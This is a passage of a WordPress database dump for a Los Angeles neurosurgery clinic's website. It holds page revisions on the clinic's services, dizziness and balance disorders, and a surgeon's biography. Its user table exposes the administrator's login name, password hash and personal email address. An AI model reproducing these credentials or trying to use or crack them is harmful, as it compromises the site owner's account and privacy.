devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #424141;\"><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:30:41','2014-06-17 22:30:41','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(39,1,'2014-06-17 22:37:45','2014-06-17 22:37:45','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: rgb(66, 65, 65);\"><span style=\"color: #333333;\">Our Services Include:</span></p>\r\n\r\n<ul>\r\n <li><strong>Neurological and Neurosurgical Evaluations</strong></li>\r\n <li><strong>Qualified Medical Examinations (QME)</strong></li>\r\n <li><strong>Agreed Medical Examinations (AME)</strong></li>\r\n <li><strong>Neurodiagnostic Procedures:</strong>\r\n<ul>\r\n <li>Electroencephalogrpahy & EEG)</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmogram (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li><strong>Neurological and Neurosurgical Treatment:</strong>\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li><strong>Other Neurosurgical techniques</strong></li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:37:45','2014-06-17 22:37:45','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(37,1,'2014-06-17 22:34:15','2014-06-17 22:34:15','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #333333;\">Our Services Include:</span>\r\n<span style=\"color: #333333;\"> <strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)</span>\r\n<span style=\"color: #333333;\"> • Electromyography (EMG)</span>\r\n<span style=\"color: #333333;\"> • Nerve Conduction Velocity Testing (NCV)</span>\r\n<span style=\"color: #333333;\"> • Electronystagmogram (ENG)</span>\r\n<span style=\"color: #333333;\"> • Neuropsychological testing</span>\r\n<span style=\"color: #333333;\"> • Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures</span>\r\n<span style=\"color: #333333;\"> • Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></span></p>\r\n\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:34:15','2014-06-17 22:34:15','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(38,1,'2014-06-17 22:35:19','2014-06-17 22:35:19','<h2 style=\"color: #204788;\"><img class=\"alignright size-full wp-image-86\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649008_scaled_186x259.jpg\" alt=\"74649008_scaled_186x259\" width=\"186\" height=\"259\" />What is dizziness?</h2>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Dizziness may be a fleeting sensation or the prolonged and intense symptom of a wide range of health problems that can affect a person\'s independence, ability to work, and quality of life. Experts believe that more than 40% of Americans will experience dizziness that is serious enough to go to a doctor. Even dizziness that seems minor, if undiagnosed, may be a signal of underlying disorders.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Balance disorders may also lead to other problems including fatigue, difficulty walking, or disinterest in everyday and leisure activities. If you or your child, parent, friend, or co-worker has a balance problem — take it seriously.</span></p>\r\n\r\n<h2 style=\"color: #204788;\">What Are the Symptoms of a Balance Disorder?</h2>\r\n<span style=\"color: #333333;\">When balance is impaired, an individual has difficulty maintaining orientation. For example, an individual may experience the room spinning and may not be able to walk without staggering or may not even be able to arise.</span>\r\n<h2 style=\"color: #204788;\">Dizziness Symptoms</h2>\r\n<ul>\r\n <li><span style=\"color: #333333;\">Sensation of Dizziness or Vertigo (Spinning)</span></li>\r\n <li><span style=\"color: #333333;\">Falling or a Feeling of Falling</span></li>\r\n <li><span style=\"color: #333333;\">Lightheadedness or Feeling Woozy</span></li>\r\n <li><span style=\"color: #333333;\">Visual Blurring</span></li>\r\n <li><span style=\"color: #333333;\">Disorientation</span></li>\r\n</ul>\r\n<span style=\"color: #333333;\">Some individuals may also experience nausea, vomiting, diarrhea, faintness, changes in heart rate and blood pressure, fear, anxiety, or panic. Reactions to these symptoms include fatigue, depression, and decreased concentration. The symptoms may appear and disappear over short time periods or last for longer periods of time.</span>\r\n<h2 style=\"color: #204788;\">How Are Balance Disorders Diagnosed?</h2>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">The physician may require tests to assess the cause and extent of the disruption of balance. The kinds of tests needed will vary based on the patient\'s symptoms and health status. Because there are so many variables, not all patients require every test.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Some examples of diagnostic tests include a hearing examination, blood tests, an electronystagmogram (ENG — a test of the vestibular system), or imaging studies of the head and brain.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">The caloric test may be performed as part of the ENG. In this test, each ear is flushed with warm and then cool water, usually one ear at a time; the amount of nystagmus resulting is measured. Weak nystagmus or the absence of nystagmus may indicate an inner ear disorder.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Another test of the vestibular system, posturography, requires the individual to stand on a special platform capable of movement within a controlled visual environment; body sway is recorded in response to movement of the platform and/or the visual environment.</span></p>\r\n<p style=\"color: #000000;\"><strong><a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/neurosurgical-evaluations-location-contact-los-angeles-ca.html\" target=\"_self\">Contact</a> us today in Los Angeles, California, to schedule an appointment or to learn more about our <a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/\" target=\"_self\">neurological evaluations</a>.</strong></p>','Dizziness','','inherit','open','open','','15-revision-v1','','','2014-06-17 22:35:19','2014-06-17 22:35:19','',15,'http://theworstpain.com/Neuro/2014/06/17/15-revision-v1/',0,'revision','',0),(43,1,'2014-06-17 22:41:58','2014-06-17 22:41:58','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:</p>\r\n\r\n<ul>\r\n <li>Neurological and Neurosurgical Evaluations</li>\r\n <li>Qualified Medical Examinations (QME)</li>\r\n <li>Agreed Medical Examinations (AME)</li>\r\n <li>Neurodiagnostic Procedures\r\n<ul>\r\n <li>Electroencephalography & EEG</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmography (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li>Neurological and Neurosurgical Treatment\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li>Other Neurosurgical techniques</li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:41:58','2014-06-17 22:41:58','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(42,1,'2014-06-17 22:40:03','2014-06-17 22:40:03','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:</p>\r\n\r\n<ul>\r\n <li>Neurological and Neurosurgical Evaluations</li>\r\n <li>Qualified Medical Examinations (QME)</li>\r\n <li>Agreed Medical Examinations (AME)</li>\r\n <li>Neurodiagnostic Procedures\r\n<ul>\r\n <li>Electroencephalograph & EEG</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmogram (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li>Neurological and Neurosurgical Treatment\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li>Other Neurosurgical techniques</li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-17 22:40:03','2014-06-17 22:40:03','',9,'http://theworstpain.com/Neuro/2014/06/17/9-revision-v1/',0,'revision','',0),(46,1,'2016-02-10 02:38:22','2016-02-10 02:38:22','<span style=\"color: #424141;\"><img class=\"alignleft size-full wp-image-55\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649097_scaled_258x211.jpg\" alt=\"74649097_scaled_258x211\" width=\"258\" height=\"211\" />Dr. Jacob Chodakiewitz, M.D., is a Stereotactic Neurosurgeon with a specialty in the field of Functional Neurosurgery. He has 28 years of experience performing stereotactic, neurosurgical procedures for the control of chronic intractable pain and tremor. Dr. Chodakiewitz collaborated closely with the late Professor D. Albe-Fessard of Paris, pioneer of microelectrode brain mapping in the thalamus, in the clinical applications of functional and stereotactic surgical techniques for the control of tremor and pain. He was director of the Functional Neurosurgical unit of the Department of Neurosurgery at UCI from 1992 to 1994.</span>\n\n<span style=\"color: #424141;\">Dr. Chodakiewitz was principal research investigator in the FDA studies of Deep Brain Stimulation (DBS) for tremor and chronic pain, and his work was instrumental in helping gain FDA approval of Deep Brain Stimulation for Parkinson\'s in August 1997.</span>\n\n<span style=\"color: #424141;\">Dr. Chodakiewitz serves as the Functional Stereotactic consultant for the department of Neurosurgery at the Southern California Kaiser Permanente Hospitals. Dr. Chodakiewitz is the Neurosurgical Director and Pain Consultant for various international victims of terror organizations, and he is a qualified medical examiner for the state of California Workers Compensation Board.</span>\n\n<span style=\"color: #424141;\">Dr. Chodakiewitz has 28 years of treating chronic pain and has been a leading pioneer in the field. He has expertise in both the neurological and neurosurgical treatment of chronic pain, which makes it possible to treat pain through a combination of modalities.</span>\n\n<span style=\"color: #424141;\">Dr. Chodakiewitz has been a pioneer in the field of deep brain stimulation in both chronic pain and Parkinsons treatment. He sits on the Board of the Save a Brain Foundation, and is a member of the Brain Research Institute (BRI) at UCLA. He also previously served in the California Geriatric Curriculum Advisory Panel on pain issues for the elderly.</span>','Dr. Chodakiewitz','','inherit','open','open','','11-autosave-v1','','','2016-02-10 02:38:22','2016-02-10 02:38:22','',11,'http://theworstpain.com/Neuro/2016/02/10/11-autosave-v1/',0,'revision','',0),(47,1,'2016-02-10 02:38:49','2016-02-10 02:38:49','<span style=\"color: #424141;\"><img class=\"alignleft size-full wp-image-55\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649097_scaled_258x211.jpg\" alt=\"74649097_scaled_258x211\" width=\"258\" height=\"211\" />Dr. Jacob Chodakiewitz, M.D., is a Stereotactic Neurosurgeon with a specialty in the field of Functional Neurosurgery. He has 28 years of experience performing stereotactic, neurosurgical procedures for the control of chronic intractable pain and tremor. Dr. Chodakiewitz collaborated closely with the late Professor D. Albe-Fessard of Paris, pioneer of microelectrode brain mapping in the thalamus, in the clinical applications of functional and stereotactic surgical techniques for the control of tremor and pain. He was director of the Functional Neurosurgical unit of the Department of Neurosurgery at UCI from 1992 to 1994.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz was principal research investigator in the FDA studies of Deep Brain Stimulation (DBS) for tremor and chronic pain, and his work was instrumental in helping gain FDA approval of Deep Brain Stimulation for Parkinson\'s in August 1997.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz serves as the Functional Stereotactic consultant for the department of Neurosurgery at the Southern California Kaiser Permanente Hospitals. Dr. Chodakiewitz is the Neurosurgical Director and Pain Consultant for various international victims of terror organizations, and he is a qualified medical examiner for the state of California Workers Compensation Board.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has 28 years of treating chronic pain and has been a leading pioneer in the field. He has expertise in both the neurological and neurosurgical treatment of chronic pain, which makes it possible to treat pain through a combination of modalities.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has been a pioneer in the field of deep brain stimulation in both chronic pain and Parkinsons treatment. He sits on the Board of the Save a Brain Foundation, and is a member of the Brain Research Institute (BRI) at UCLA. He also previously served in the California Geriatric Curriculum Advisory Panel on pain issues for the elderly.</span>','Dr. Chodakiewitz','','inherit','open','open','','11-revision-v1','','','2016-02-10 02:38:49','2016-02-10 02:38:49','',11,'http://theworstpain.com/Neuro/2016/02/10/11-revision-v1/',0,'revision','',0); /*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_relationships` -- DROP TABLE IF EXISTS `wp_term_relationships`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL default '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL default '0', `term_order` int(11) NOT NULL default '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_relationships` -- LOCK TABLES `wp_term_relationships` WRITE; /*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */; INSERT INTO `wp_term_relationships` VALUES (1,1,0),(22,2,0),(19,2,0),(20,2,0),(21,2,0),(25,2,0); /*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_taxonomy` -- DROP TABLE IF EXISTS `wp_term_taxonomy`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL auto_increment, `term_id` bigint(20) unsigned NOT NULL default '0', `taxonomy` varchar(32) NOT NULL default '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL default '0', `count` bigint(20) NOT NULL default '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_taxonomy` -- LOCK TABLES `wp_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */; INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'nav_menu','',0,5); /*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_terms` -- DROP TABLE IF EXISTS `wp_terms`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_terms` ( `term_id` bigint(20) unsigned NOT NULL auto_increment, `name` varchar(200) NOT NULL default '', `slug` varchar(200) NOT NULL default '', `term_group` bigint(10) NOT NULL default '0', PRIMARY KEY (`term_id`), UNIQUE KEY `slug` (`slug`), KEY `name` (`name`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_terms` -- LOCK TABLES `wp_terms` WRITE; /*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */; INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Main','main',0); /*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_usermeta` -- DROP TABLE IF EXISTS `wp_usermeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL auto_increment, `user_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_usermeta` -- LOCK TABLES `wp_usermeta` WRITE; /*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */; INSERT INTO `wp_usermeta` VALUES (1,1,'first_name',''),(2,1,'last_name',''),(3,1,'nickname','tresser'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp350_media,wp360_revisions,wp360_locks,wp390_widgets'),(13,1,'default_password_nag',''),(14,1,'show_welcome_panel','1'),(15,1,'wp_dashboard_quick_press_last_post_id','48'),(16,1,'wp_user-settings','editor=tinymce&wplink=1&hidetb=1'),(17,1,'wp_user-settings-time','1403044000'),(18,1,'managenav-menuscolumnshidden','a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),(19,1,'metaboxhidden_nav-menus','a:6:{i:0;s:8:\"add-post\";i:1;s:11:\"add-service\";i:2;s:9:\"add-staff\";i:3;s:12:\"add-post_tag\";i:4;s:20:\"add-service-category\";i:5;s:14:\"add-department\";}'),(20,1,'nav_menu_recently_edited','2'),(21,1,'wpseo_ignore_tour','1'); /*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_users` -- DROP TABLE IF EXISTS `wp_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `user_login` varchar(60) NOT NULL default '', `user_pass` varchar(64) NOT NULL default '', `user_nicename` varchar(50) NOT NULL default '', `user_email` varchar(100) NOT NULL default '', `user_url` varchar(100) NOT NULL default '', `user_registered` datetime NOT NULL default '0000-00-00 00:00:00', `user_activation_key` varchar(60) NOT NULL default '', `user_status` int(11) NOT NULL default '0', `display_name` varchar(250) NOT NULL default '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_users` -- LOCK TABLES `wp_users` WRITE; /*!40000 ALTER TABLE `wp_users` DISABLE KEYS */; INSERT INTO `wp_users` VALUES (1,'tresser','$P$BYBr2qzuabFdkrmwlY8vhoLE6uwCxo.','tresser','jonathancalmus@gmail.com','','2014-06-15 03:27:39','',0,'tresser'); /*!40000 ALTER TABLE `wp_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database '1_0002df5_0' -- DELIMITER ;; DELIMITER ; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2017-07-14 9:02:44